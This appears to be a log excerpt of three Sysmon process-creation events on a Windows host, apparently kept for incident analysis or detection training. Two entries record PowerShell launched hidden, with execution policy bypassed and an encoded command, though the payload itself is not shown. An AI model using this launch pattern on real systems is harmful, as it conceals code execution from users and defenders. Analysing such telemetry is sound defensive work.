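EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 5613964
Channel: Microsoft-Windows-Sysmon/Operational
Computer: ar-win-3
RuleName: -
UtcTime: 2025-03-24 15:11:49.226
ProcessGuid: {e8747bb8-7635-67e1-3964-000000004103}
ProcessId: 1204
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ep bypas -enc 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
CurrentDirectory: :\Users\Administrator\Desktop\
User: AR-WIN-3\Administrator
LogonGuid: {e8747bb8-6cb6-67e1-29a5-040700000000}
LogonId: 0x704a529
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C
ParentProcessGuid: {e8747bb8-6cb9-67e1-2463-000000004103}
ParentProcessId: 5368
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE
ParentUser: AR-WIN-3\Administrator
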
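EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 5597245
Channel: Microsoft-Windows-Sysmon/Operational
Computer: ar-win-3
RuleName: -
UtcTime: 2025-03-24 14:49:00.298
ProcessGuid: {e8747bb8-70dc-67e1-a963-000000004103}
ProcessId: 3852
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CurrentDirectory: C:\Users\Administrator\
User: AR-WIN-3\Administrator
LogonGuid: {e8747bb8-6cb6-67e1-29a5-040700000000}
LogonId: 0x704a529
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C
ParentProcessGuid: {e8747bb8-6cb9-67e1-2463-000000004103}
ParentProcessId: 5368
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE
ParentUser: AR-WIN-3\Administrator
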
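EventID: 1
Version: 5
Level: 4
Task: 1
Opcode: 0
Keywords: 0x8000000000000000
EventRecordID: 5585441
Channel: Microsoft-Windows-Sysmon/Operational
Computer: ar-win-3
RuleName: -
UtcTime: 2025-03-24 14:34:26.226
ProcessGuid: {e8747bb8-6d72-67e1-4d63-000000004103}
ProcessId: 5288
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ep bypas -enc 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
CurrentDirectory: :\Users\Administrator\Desktop\
User: AR-WIN-3\Administrator
LogonGuid: {e8747bb8-6cb6-67e1-29a5-040700000000}
LogonId: 0x704a529
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C
ParentProcessGuid: {e8747bb8-6cb9-67e1-2463-000000004103}
ParentProcessId: 5368
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE
ParentUser: AR-WIN-3\Administrator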